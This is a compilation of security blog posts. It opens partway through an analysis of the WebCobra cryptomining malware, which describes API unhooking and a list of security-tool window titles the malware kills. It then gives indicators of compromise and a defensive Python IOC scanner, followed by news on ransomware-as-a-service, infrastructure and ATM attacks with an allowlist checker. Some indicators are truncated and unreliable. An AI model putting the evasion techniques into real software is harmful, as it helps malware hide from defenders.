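Because every step is a bijection on a byte, the transform is trivially reversible, which is why a dumped data.bin can be decoded offline without running the DLL.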

The program checks the running environment to launch the proper miner, shown in the following diagram:

Figure 7: Launching the proper miner depending on a system’s configuration.

Once data.bin is decrypted and executed, it tries a few anti-debugging, anti-emulation, and anti-sandbox techniques as well as checks of other security products running on the system. These steps allow the malware to remain undetected for a long time.

Most security products hook some APIs to monitor the behavior of malware. To avoid being found by this technique, WebCobra loads ntdll.dll and user32.dll as data files in memory, giving it a clean copy of each module, and writes the first 8 bytes of each function from that clean copy over the live function in the process. Any inline hook a security product placed at the start of the function is overwritten, which unhooks the APIs.

List of unhooked ntdll.dll APIs

  • LdrLoadDll
  • ZwWriteVirtualMemory
  • ZwResumeThread
  • ZwQueryInformationProcess
  • ZwOpenSemaphore
  • ZwOpenMutant
  • ZwOpenEvent
  • ZwMapViewOfSection
  • ZwCreateUserProcess
  • ZwCreateSemaphore
  • ZwCreateMutant
  • ZwCreateEvent
  • RtlQueryEnvironmentVariable
  • RtlDecompressBuffer

List of unhooked user32.dll APIs

  • SetWindowsHookExW
  • SetWindowsHookExA

Infecting an x86 system

The malware injects malicious code into svchost.exe and uses an infinite loop to enumerate all open windows, comparing each window’s title bar text with the following strings. This is another check by WebCobra to determine whether it is running in an isolated environment designed for malware analysis, or next to an analysis or removal tool.

  • adw
  • emsi
  • avz
  • farbar
  • glax
  • delfix
  • rogue
  • exe
  • asw_av_popup_wndclass
  • snxhk_border_mywnd
  • AvastCefWindow
  • AlertWindow
  • UnHackMe
  • eset
  • hacker
  • AnVir
  • Rogue
  • uVS
  • malware

If a window’s title bar text contains any of the preceding strings, the malware terminates the owning process. Note how broad some entries are: “exe”, “rogue” and “hacker” will also match plenty of windows that have nothing to do with security tooling.

Figure 8: Terminating a process if the windows title bar text contains specific strings.

Once the process monitor is running, it creates an instance of svchost.exe with the miner’s configuration file as a command-line argument and injects the Cryptonight miner code into it.

Figure 9: Creating an instance of svchost.exe and executing the Cryptonight miner.

Finally, the malware resumes the process with the Cryptonight miner running silently and consuming almost all the CPU’s resources.

Figure 10: An x86 machine infected with the Cryptonight miner. 

Infecting an x64 system

The malware terminates the infection if it finds Wireshark running.

Figure 11: Checking for Wireshark.

The malware checks the GPU brand and mode. It runs only if one of the following GPUs is installed:

  • Radeon
  • Nvidia
  • Asus

Figure 12: Checking the GPU mode.

If these checks are successful, the malware creates the following folder with hidden attributes and downloads and executes Claymore’s Zcash miner from a remote server.

  • C:\Users\AppData\Local\WIX Toolset 11.2

Figure 13: Requesting the download of Claymore’s Zcash miner.

Figure 14: Claymore’s miner.

Figure 15: Executing the miner with its configuration file.

Finally, the malware drops a batch file at %temp%\–xxxxx.cMD to delete the main dropper from [WindowsFolder]\{DE03ECBA-2A77-438C-8243-0AF592BDBB20}\*.*.

Figure 16: A batch file deleting the dropper.

The configuration files of the miners follow.

Figure 17: Cryptonight’s configuration file.

This configuration file contains:

  • The mining pool: 5.149.254.170
  • Username: 49YfyE1xWHG1vywX2xTV8XZzbzB1E2QHEF9GtzPhSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C
  • Password: soft-net

Figure 18: Claymore’s Zcash miner configuration file.

This configuration file contains:

  • The mining pool: eu.zec.slushpool.com
  • Username: pavelcom.nln
  • Password: zzz

Coin mining malware will continue to evolve as cybercriminals take advantage of this relatively easy path to stealing value. Mining coins on other people’s systems requires less investment and risk than ransomware, and does not depend on a percentage of victims agreeing to send money. Until users learn they are supporting criminal miners, the latter have much to gain.

 

MITRE ATT&CK techniques

  • Exfiltration over command and control channel (T1041)
  • Command-line interface (T1059)
  • Hooking (T1179)
  • Data from local system (T1005)
  • File and directory discovery (T1083)
  • Query registry (T1012)
  • System information discovery (T1082)
  • Process discovery (T1057)
  • System time discovery (T1124)
  • Process injection (T1055)
  • Data encrypted (T1022)
  • Data obfuscation (T1001)
  • Multilayer encryption (T1079)
  • File deletion (T1107)

Indicators of compromise

IP addresses

  • 149.249.13:2224
  • 5.149.254.170:2223
  • 31.92.212

Domains

  • fee.xmrig.com
  • ru
  • eu.zec.slushpool.com
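As an added example (not McAfee’s code), the network indicators from the miner configurations and the IOC list above can be checked against DNS and connection logs. The log layout, the workstation names such as ws-0412 and the traffic lines are constructed for this example; the pool hosts, pool endpoint, stratum ports and wallet address are the ones listed in this post:

```python
# Added example (not McAfee's code): matching the network indicators from the
# report against constructed log lines. The "<timestamp> <host> dns|conn
# <destination>[:port] [extra]" layout is made up for this example and is not
# any product's log format.
import re
from typing import List, Optional, Tuple

# Indicators taken from the miner configurations and IOC list in the report.
POOL_HOSTS = {"eu.zec.slushpool.com", "fee.xmrig.com"}
POOL_ENDPOINTS = {("5.149.254.170", 2223)}
# Stratum ports seen in the report's IOCs; a connection to one of these on an
# unknown host is worth a second look even without a hostname hit.
STRATUM_PORTS = {2223, 2224}
# Wallet from the Cryptonight configuration (the pool "username").
WALLET = "49YfyE1xWHG1vywX2xTV8XZzbzB1E2QHEF9GtzPhSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C"

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<kind>dns|conn)\s+"
    r"(?P<dst>[^:\s]+)(?::(?P<port>\d+))?(?:\s+(?P<extra>.*))?$"
)


def matches_pool_host(name: str) -> bool:
    """Exact or subdomain match against the listed pool hostnames."""
    name = name.lower().rstrip(".")
    return any(name == h or name.endswith("." + h) for h in POOL_HOSTS)


def classify(line: str) -> Optional[str]:
    """Return the reason a line is suspicious, or None if it is clean."""
    m = LINE_RE.match(line)
    if not m:
        return None
    dst, kind = m["dst"], m["kind"]
    port = int(m["port"]) if m["port"] else None
    extra = m["extra"] or ""
    if WALLET in extra:
        return "known miner wallet in payload"
    if kind == "dns" and matches_pool_host(dst):
        return "DNS lookup of known mining pool"
    if kind == "conn":
        if (dst, port) in POOL_ENDPOINTS:
            return "connection to known mining pool endpoint"
        if matches_pool_host(dst):
            return "connection to known mining pool"
        if port in STRATUM_PORTS:
            return "connection on stratum port seen in WebCobra IOCs"
    return None


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Scan log lines; return (1-based line number, source host, reason) per hit."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        reason = classify(line)
        if reason:
            hits.append((lineno, LINE_RE.match(line)["src"], reason))
    return hits


# Constructed sample log; nothing here comes from real traffic.
SAMPLE_LOG = "\n".join([
    "2018-09-10T08:00:01Z ws-0412 dns www.example.com",
    "2018-09-10T08:00:05Z ws-0412 dns eu.zec.slushpool.com",
    "2018-09-10T08:00:06Z ws-0412 conn 5.149.254.170:2223",
    "2018-09-10T08:00:09Z ws-0417 conn 203.0.113.9:443",
    "2018-09-10T08:01:00Z ws-0412 conn 10.0.0.5:2224",
    "2018-09-10T08:02:00Z ws-0433 dns fee.xmrig.com",
    f"2018-09-10T08:03:00Z ws-0412 conn 198.51.100.7:3333 login={WALLET}",
])

if __name__ == "__main__":
    for lineno, src, reason in scan(SAMPLE_LOG.splitlines()):
        print(f"line {lineno} ({src}): {reason}")
```

The wallet check matters most: pool addresses and ports change between campaigns, but the operator’s wallet is what the miner must send in its login, so a proxy or IDS that can see the stratum login line gets a durable indicator.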

McAfee detections

  • CoinMiner Version 2 in DAT Version 8986; Version 3 in DAT Version 3437
  • l Version 2 in DAT Version 9001; Version 3 in DAT Version 3452
  • RDN/Generic PUP.x Version 2 in DAT Version 8996; Version 3 in DAT Version 3447
  • Trojan-FQBZ, Trojan-FQCB, Trojan-FQCR Versions 2 in DAT Version 9011; Versions 3 in DAT Version 3462

Hashes (SHA-256)

  • 5E14478931E31CF804E08A09E8DFFD091DB9ABD684926792DBEBEA9B827C9F37
  • 2ED8448A833D5BBE72E667A4CB311A88F94143AA77C55FBDBD36EE235E2D9423
  • F4ED5C03766905F8206AA3130C0CDEDEC24B36AF47C2CE212036D6F904569350
  • 1BDFF1F068EB619803ECD65C4ACB2C742718B0EE2F462DF795208EA913F3353B
  • D4003E6978BCFEF44FDA3CB13D618EC89BF93DEBB75C0440C3AC4C1ED2472742
  • 06AD9DDC92869E989C1DF8E991B1BD18FB47BCEB8ECC9806756493BA3A1A17D6
  • 615BFE5A8AE7E0862A03D183E661C40A1D3D447EDDABF164FC5E6D4D183796E0
  • F31285AE705FF60007BF48AEFBC7AC75A3EA507C2E76B01BA5F478076FA5D1B3
  • AA0DBF77D5AA985EEA52DDDA522544CA0169DCA4AB8FB5141ED2BDD2A5EC16CE

The post WebCobra Malware Uses Victims’ Computers to Mine Cryptocurrency appeared first on McAfee Blogs.

Bank Attacks Put Password Insecurity Back in the Spotlight

Two separate attacks on banks in the United States and Pakistan, revealed this week, once again highlight the inherent weakness of security practices that rely on passwords or other knowledge-based credentials to protect critical information. International bank HSBC said it was the victim of a credential-stuffing attack and became aware of unauthorized access...


Ransomware-as-a-Service Program Offers Affiliates Up to 75 Percent of Revenue to Spread Infection

A ransomware-as-a-service program called FilesLocker is offering affiliates commissions of up to 75 percent of all revenue extorted from victims, provided they can drive enough infections.

Details about FilesLocker were first posted on Twitter, but a subsequent investigation traced it to a Chinese-language cybercrime forum on Tor, the anonymity network. Written in C# and available in both Chinese and English, it is promoted on the forum with features such as strong encryption, deletion of shadow volume copies, and customization options.

While security researchers describe FilesLocker as relatively unsophisticated in design, it encrypts victims’ files with a per-victim key that is in turn encrypted with a public key embedded in the malware, so the files cannot be recovered without the operator’s private key. It scans common folders such as Documents and Pictures, appends a .locked extension to the files it encrypts, and then displays a note demanding 0.18 bitcoin, to be arranged through a specific email address, along with an automatically generated victim ID for tracking purposes.

How Affiliates Qualify For FilesLocker Spoils

The developer behind FilesLocker stipulated that interested affiliates should have a proven track record of distributing ransomware through phishing or other methods, with a minimum of 10 infections a day. He or she also warned affiliates against uploading the program to multi-engine malware scanning services, which would expose it to antivirus vendors. While those who do particularly well can earn three-quarters of what is gathered from victims, the program’s base revenue share is 60 percent.

The practice of spreading ransomware through affiliates is becoming more common among cybercriminals. Back in August, for example, cybercriminals pitched a similar ransomware-as-a-service threat dubbed Princess Evolution to potential partners for the same 60 percent revenue share.

Containing Threats Like FilesLocker

While it’s common and natural to panic upon seeing a ransom note pop up on the screen, security leaders should train users to report such incidents as quickly as possible so they can minimize the potential spread of ransomware-as-a-service programs.

IBM Security’s “Ransomware Response Guide” advised security professionals to immediately disconnect any machine infected with ransomware from the corporate network, as well as any access to Wi-Fi or other services that could link back to the attacker.

Isolating a system buys the security team time to conduct a proper root cause analysis (RCA) to identify how the ransomware is being distributed, which may mean closing off email or other communication channels for at-risk employees. Since malware developers are starting to work as teams, their potential victims need to do the same.

Sources: BleepingComputer, Malware Hunter, Virus Total

The post Ransomware-as-a-Service Program Offers Affiliates Up to 75 Percent of Revenue to Spread Infection appeared first on Security Intelligence.

Compromising vital infrastructure: transport and logistics

Back when I was a dispatcher for a courier and trucking company, we used to joke that it only took a few strategically-placed accidents to cause a traffic jam that could completely stop circulation around the city of Rotterdam.

Rotterdam is one of the major ports in the world and consequently, there is a lot of traffic coming in and out. The roads around the city can handle normal traffic, but they get congested during rush hours and when accidents happen. If you live or work near a city, you’re probably also stuck in a traffic jam on a regular basis.

In our series about vital infrastructure, this time we’re looking at transportation. And if you think transport is not that vital, you are underestimating the logistical processes that make getting to and from different locations possible.

In this post, we will focus on the main skeleton of our logistics infrastructure: the mass transportation of goods over the surface of the earth. How do the goods that we use every day make their way into the warehouses, stores, or factories that need them? We will deal with air and public transportation separately, as they use completely different infrastructures in order to function.

Shipping by sea or ocean

A lot of the goods we consume are manufactured a long way from home. The first leg of their journey is typically by ship across international waters. When you realize that the largest container ships can carry over 20,000 20-foot containers, you can imagine the amount of paperwork and computing needed to get every one of those containers to the correct destination. And every one of them must go through customs, usually twice; customs will want to know exactly what is in them, or they will hold the containers until they do.

Throwing a wrench in an otherwise well-oiled machine like that can have dire consequences as Maersk, one of the largest shipping lines, learned the hard way when their organization was hit by NotPetya. Estimates of the damages done due to a “serious business interruption” were around $300 million. This interruption also caused a massive supply delay, ranging from hours to several days.

Critical information systems used during these processes could be targeted as a means to disrupt the logistics network, which can slow down or even bring to a halt an entire country’s economic system.

Trains and river shipping

Depending on existing connections and infrastructure, goods are moved in bulk from harbors to inland destinations, typically by train or barge. Unlike road transport, these modes offer few ways to maneuver around a blocked section of the route.

Since train and river transport are mainly used for large volumes of goods, they are also vulnerable to attacks on the administrative side. In addition, physical attack vectors can hinder transport and disrupt logistics. Some examples:

  • Cutting the power to a rail-track
  • Disabling the railway signals
  • Disabling rail traffic management systems
  • Gaining control over sluices or other means to control the water level in rivers and canals
  • Jamming radars, so ships will have to slow down to avoid collisions

Road transport

Although one truckload is small compared to the transportation modes we have discussed so far, attacks on major delivery firms like FedEx can be highly effective. In fact, the damages due to the NotPetya infection at their TNT division were in roughly the same region as those estimated by Maersk after the same infection.

Even though trucks have more options to avoid roadblocks than trains and riverboats, huge slow-downs can be caused by tactically employed attacks on important infrastructure, such as tunnels, bridges and highway intersections. And you don’t need to cause accidents to accomplish this. Hacking traffic control systems is a much less dangerous and possibly more effective means of disruption if you are able to implement it on a large scale.


Special parts of the logistics infrastructure

The first part we need to consider is the container terminals. The average daily yard utilization of large container terminals in Europe is about 10,000–20,000 containers, resulting in about 15,000 movements per day. Handling a container ship of the Post Panamax size requires about 150 moves per hour, which means using five cranes that are able to handle 30 moves per hour each. Planning and keeping track of all these movements is heavily computerized and therefore vulnerable to cyberattacks.

Of the thousands of ports worldwide, only about one hundred have a global importance. These ports are an attractive target for attack.

The second part is bunkering, which is an essential part of transport. Electric trucks and ships are still a rare commodity, so most of them will need to refuel at regular intervals. Cutting off oil supplies to a country that does not have the capacity to produce enough of its own is a sure way to stifle transport and bring its economy to a standstill.

Threats

Most of the cyberattacks we have seen to date that have had a major impact on transportation systems are ransomware attacks. These infections are hard to predict and, in some cases, hard to stop. But you can be sure that the logistics infrastructure will be a target in the case of a full-scale cyberwar.

So far, awareness of this fact alone hasn’t been enough to implement adequate countermeasures—at least not adequate enough to counter a ransomware infection like NotPetya. And let’s not forget that WannaCry threw Germany’s rail network into chaos, disrupted FedEx’s delivery unit, and wreaked havoc among many others.

If this much damage can be done by a mindless ransomware attack, can you imagine what kind of destruction a targeted APT could cause? If you can hinder the enemy’s ability to move goods, supplies, and troops, that is a big advantage in warfare. This fact about military logistics was known and implemented as far back as the American Civil War (1861–65), where both armies used railways extensively for transport of personnel, supplies, horses and mules, and heavy field pieces. Both sides tried to disrupt the enemy’s logistics by destroying trackage and bridges.

Paying the price

In a line of business like logistics, where every penny counts, cybersecurity may be one of the last things managers care about. But that doesn’t make it any less important. The damage done by an organization-wide ransomware infection can put companies out of business. Having to rebuild your network while the core business has to be conducted by hand (and memory) is not just frustrating; it’s costly. Recovering from a cyberattack requires time and attention that cannot be spent on other tasks.

Keeping transportation infrastructure itself safe and secure is a government task, since it is also a matter of national security to protect these assets during a cyberattack. The technology behind our infrastructure plays an important part in determining both the logistical capabilities and the control we have over them.

Spending on critical infrastructural improvements should include cybersecurity as an important consideration. Companies in logistics, from the major shipping lines down to the local trucking companies, are aware of the important task they are fulfilling, and should not shy away from taking a good hard look at their existing security measures. Do they reflect the importance of their business to the overall economy of the region? Are they prepared to survive a ransomware attack? Is their staff trained to recognize phishing attempts? Are their computer systems protected against malware and targeted attacks?

Trust us, the first time you need the protection, a strong cybersecurity policy, training program for employees, and technical solution will already have paid itself back a thousand times.

Stay safe, everyone!

The post Compromising vital infrastructure: transport and logistics appeared first on Malwarebytes Labs.

Destructive Attacks Spike in Q3, Putting Election Security at Risk

A new report revealed that nearly one-third of cyber incidents reported in Q3 2018 were classified as “destructive attacks,” putting election security at risk in the lead-up to the 2018 midterms.

In its “Quarterly Incident Response Threat Report” for November 2018, Carbon Black found that 32 percent of election-season cyberattacks were destructive in nature — that is, “attacks that are tailored to specific targets, cause system outages and destroy data in ways designed to paralyze an organization’s operations.” These attacks targeted a wide range of industries, most notably financial services (78 percent) and healthcare (59 percent).

In addition, the report revealed that roughly half of cyberattacks now leverage island hopping, a technique that threatens not only the target company, but its customers and partners as well. Thirty percent of survey respondents reported seeing victims’ websites converted into watering holes.

Time to Panic About Election Security? Not So Fast

Despite these alarming statistics and the very real risks they signify, Cris Thomas (aka Space Rogue) of IBM X-Force Red told TechRepublic that since voting machines are not connected to the internet, a malicious actor would need physical access to compromise one. This could prove challenging for attackers, who must understand not only the vulnerabilities in each individual voting machine, but also each precinct’s policies.

Bad actors could theoretically stage an attack by obtaining an official voting machine before the election and gaining physical access to it on voting day, but these machines come with checks and balances that detect when votes are changed, decreasing the likelihood of a successful attack.

Attacks Are Growing Increasingly Evasive — and Expensive

Still, the rise in destructive attacks is particularly concerning given that, as reported by Carbon Black, attacks across the board are becoming more difficult to detect. In addition, 51 percent of cases involved counter-incident response techniques, and nearly three-quarters of participants specifically witnessed the destruction of logs during these incidents. Meanwhile, 41 percent observed attackers circumventing network-based protections.

These evasive tactics could prove costly for companies. According to Accenture, threat actors could set companies back as much as $2.4 million with a single malware incident, with cybercrime costing each organization an average of $11.7 million per year.

How to Defend Against Destructive Attacks

Security professionals can defend their organizations against destructive attacks by developing a dedicated framework to predict what steps an adversary might take once inside the network. Security teams should supplement this framework with AI tools that can use pattern recognition and behavior analysis to stay one step ahead of cyberthreats.

Sources: Carbon Black, Accenture, TechRepublic

The post Destructive Attacks Spike in Q3, Putting Election Security at Risk appeared first on Security Intelligence.

Cyber-Attacks: How to Stop a Multibillion-Dollar Problem

By Ed Cabrera, Chief Cybersecurity Officer for Trend Micro and Martin Bally, Vice President & Chief Security Officer for Diebold Nixdorf 

Where there’s money, there has always been crime. Traditional bank robbery and physical assaults on ATMs are still a challenge, and now a new breed of cyber-enabled theft—using ATMs as the endpoint for cash-outs— has become a multibillion-dollar problem. One recent raid saw $13.5m stolen from India’s Cosmos Bank. Although the FBI issued a warning about an impending “ATM cash-out” operation, it was too late; the bank was attacked just one day after the warning. So what can financial institutions do about a decade-long threat showing no signs of abating?

Cashing in on cash-outs

The FBI claimed that ATM cash-outs are often targeted against smaller banks which might not have the same budget to spend on cybersecurity as their larger counterparts. In the case of the Cosmos attack, and in the Carbanak and Anunak cyberattacks, international gangs phish their way into back-end systems, exploiting network access to install malware that removes fraud controls such as maximum withdrawal amounts, transfers funds to other banks and increases customer balances. Dispersed gangs of mules then use cloned magstripe cards to withdraw the funds. In other cyber-attacks, such as ATM jackpotting, the software of the ATM itself is altered. The variety of approaches used by cyber-criminals reinforces the necessity of building a holistic, layered approach to security, which is inclusive of both the endpoint (ATM) and a bank’s entire internal software stack.

In the end, the FBI’s warning did nothing to help Pune-headquartered Cosmos Bank, as accomplices withdrew millions from ATMs in 28 countries around the world. It claimed the perpetrators had even managed to bypass internal transaction approval systems to enable the attack. But this was certainly not the first such cyber-attack: in 2013, cyber-criminals stole $45m from ATMs, and in 2016 over $12m was taken from cashpoints in Japan using cards cloned from a South African bank. That’s not to mention the activity of the infamous Carbanak gang, said to have been responsible for as much as $1bn in theft from banks around the world, using different attack methods also including the ATM as the cash-out point.

From physical to network-based attacks

These advanced network attacks differ from traditional ATM attacks which aim to either empty an ATM’s cash cassettes into the hands of waiting mules (jackpotting), or skim card details virtually or physically for later use or sale on the dark web. This meant installing secret cameras, card reader slots and PIN overlay pads to record/’skim’ lucrative card information, or opening up the ATM case to install malware manually via USB or CD-ROM. That malware is designed to send commands to the ATM via its XFS middleware, to dispense cash — the whole process perhaps taking as little as 10 minutes. Malware families such as Skimer, GreenDispenser, Ploutus, and Alice illustrate the continued popularity of onsite malware attacks.

However, back in 2016 Trend Micro and Europol documented another category of attacks gaining in popularity, leveraging the network as the entry point. Although these require a greater investment of time and resources up front, they’re less likely to raise suspicion as there’s no interference with the physical ATM itself. Instead, hackers infiltrate the bank’s network via malware-laden phishing emails, steal admin credentials and move laterally inside until they gain remote access to the ATMs. Multiple machines can be commanded to issue cash at the same time and some malware can even delete itself, making forensics harder. Ripper malware was the first of its kind spotted in this kind of network attack.

Protecting your ATM network

ATM attacks continue to reap financial rewards for their perpetrators, which means we should not expect them to let up. In fact, the U.S. saw its first jackpotting attacks this year, and the FBI said of ATM cash-outs that it “expects the ubiquity of this activity to continue or possibly increase in the near future.”

Skimming alone is thought to be a $2bn+ industry-wide problem. Over the years, criminals have made skimmers smaller, smarter and virtually undetectable. And even as EMV compliance makes its way across the U.S. and around the globe, skimming remains one of the financial industry’s most costly problems.

So what can financial institutions do to protect funds and cardholder data? ATM attackers take advantage of many classic security lapses, such as credulous end users, lax password control, poor network segmentation and unpatched systems. A best practice approach should therefore include:

Regular updates to the underlying OS and relevant software (e.g. XFS).

Physical security for ATMs including tamper alarms on high risk machines; 2FA access control for technicians; regular service checks; anti-skimming modules.

Intrusion prevention and hard disk encryption to protect ATMs during operation.

Improved user education in how to spot phishing emails.

Network segmentation to make lateral movement harder inside the bank network.

Application control/whitelisting to further reduce risk of malware infection.

Continuous network monitoring to raise the alarm if there is a network intrusion.
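Two of the controls above, application control and network segmentation with continuous monitoring, are easy to state and easy to get wrong in practice, so here is an added example (not code from Trend Micro, Diebold Nixdorf or the Europol report) of what the checks look like when applied to telemetry from an ATM estate. The allowlist, the SHA-256 values, the hostnames, the addresses and the events are all constructed for the example; the segmentation policy it encodes (management protocols may enter the ATM segment only from a designated jump host, and ATMs never manage each other) is an assumption, not a description of any real bank’s network.

```python
"""Allowlist and segmentation checks over constructed ATM-estate telemetry.

Added example, not code from Trend Micro, Diebold Nixdorf or Europol.
Every path, hash, address and event below is constructed for illustration.
"""
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import List, Optional

# Constructed application allowlist: image path -> expected SHA-256 of the binary.
# On a real estate this comes from the gold image; the hashes here are placeholders.
ATM_ALLOWLIST = {
    r"C:\XFS\XFSManager.exe": "1f2e3d4c" * 8,
    r"C:\ATM\Vendor\Dispenser.exe": "9a8b7c6d" * 8,
}

# Constructed segmentation policy (an assumption for this example): management
# protocols may reach the ATM segment only from the designated jump host.
ATM_SEGMENT = ip_network("10.50.0.0/24")
MGMT_JUMP_HOSTS = {ip_address("10.10.1.5")}
MGMT_PORTS = {445, 3389, 5985}  # SMB, RDP, WinRM


@dataclass(frozen=True)
class Finding:
    kind: str    # "unlisted-executable", "hash-mismatch" or "segmentation-violation"
    detail: str


def check_process_event(event: dict) -> Optional[Finding]:
    """Flag an execution that is not on the allowlist or whose binary was replaced."""
    expected = ATM_ALLOWLIST.get(event["image"])
    if expected is None:
        return Finding("unlisted-executable", f'{event["host"]}: {event["image"]}')
    if event["sha256"].lower() != expected:
        # Known path, wrong content: the binary on disk is not the one from the image.
        return Finding("hash-mismatch", f'{event["host"]}: {event["image"]}')
    return None


def check_flow(flow: dict) -> Optional[Finding]:
    """Flag management-port traffic into the ATM segment from anything but the jump host."""
    src, dst = ip_address(flow["src"]), ip_address(flow["dst"])
    if dst not in ATM_SEGMENT or flow["dport"] not in MGMT_PORTS:
        return None  # not management traffic into the ATM segment; out of scope here
    if src in MGMT_JUMP_HOSTS:
        return None
    origin = "inside ATM segment" if src in ATM_SEGMENT else "outside ATM segment"
    return Finding("segmentation-violation", f"{src} -> {dst}:{flow['dport']} ({origin})")


def evaluate(process_events: List[dict], flows: List[dict]) -> List[Finding]:
    """Run both checks and return every finding, process events first."""
    findings = [f for f in map(check_process_event, process_events) if f]
    findings += [f for f in map(check_flow, flows) if f]
    return findings


# Constructed telemetry: one clean execution, one unknown binary, one replaced binary.
SAMPLE_PROCESS_EVENTS = [
    {"host": "atm-0012", "image": r"C:\XFS\XFSManager.exe", "sha256": "1f2e3d4c" * 8},
    {"host": "atm-0012", "image": r"C:\Users\Public\svchost.exe", "sha256": "deadbeef" * 8},
    {"host": "atm-0013", "image": r"C:\ATM\Vendor\Dispenser.exe", "sha256": "0badf00d" * 8},
]

# Constructed flows: jump-host RDP (allowed), office workstation SMB (violation),
# ATM-to-ATM SMB (violation: peers in the ATM segment should never manage each other).
SAMPLE_FLOWS = [
    {"src": "10.10.1.5", "dst": "10.50.0.12", "dport": 3389},
    {"src": "10.20.3.7", "dst": "10.50.0.12", "dport": 445},
    {"src": "10.50.0.12", "dst": "10.50.0.13", "dport": 445},
]

if __name__ == "__main__":
    for finding in evaluate(SAMPLE_PROCESS_EVENTS, SAMPLE_FLOWS):
        print(f"[{finding.kind}] {finding.detail}")
```

The hash comparison is what makes the allowlist more than a path filter: a replaced `Dispenser.exe` at the expected path is still caught. The flow check deliberately treats ATM-to-ATM management traffic as a violation, because that is the pattern the text describes for network-based attacks (remote access to one machine used to reach the others); whether such peer traffic is legitimate on a given estate is a policy decision to confirm before deploying a rule like this.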

As long as there is money to be had behind that metal casing, criminal gangs will always be looking for innovative ways to get to it. To stop them cashing in by cashing out at the ATM, we need to understand the risks and take time to plug in multi-layered defenses.

To find out more, read our report, co-authored with Europol: Cashing in on ATM Malware.

The post Cyber-Attacks: How to Stop a Multibillion-Dollar Problem appeared first on .

IoT Lockdown: Ways to Secure Your Family’s Digital Home and Lifestyle

If you took an inventory of your digital possessions, chances are most of your life — everything from phones to toys, to wearables, to appliances — has wholly transitioned from analog to digital (rotary to wireless). What you may not realize is that with this dramatic transition comes a fair amount of risk.

Privacy for Progress

With this massive tech migration, an invisible exchange has happened: Privacy for progress. Here we are intentionally and happily immersed in the Internet of Things (IoT). IoT is defined as everyday objects with computing devices embedded in them that can send and receive data over the internet.

That’s right. Your favorite fitness tracking app may be collecting and giving away personal data. That smart toy, baby device, or video game may be monitoring your child’s behavior and gathering information to influence future purchases. And, that smart coffee maker may be transmitting more than just good morning vibes.

A Gartner report estimated there were 8.4 billion connected “things” in 2017 and as many as 20 billion by 2020. The ability of some IoT devices is staggering and, frankly, a bit frightening. The data collection ability of smart devices and services on the market is far greater than most of us realize. Rooms, devices, and apps come equipped with sensors and controls that can gather and inform third parties about consumers.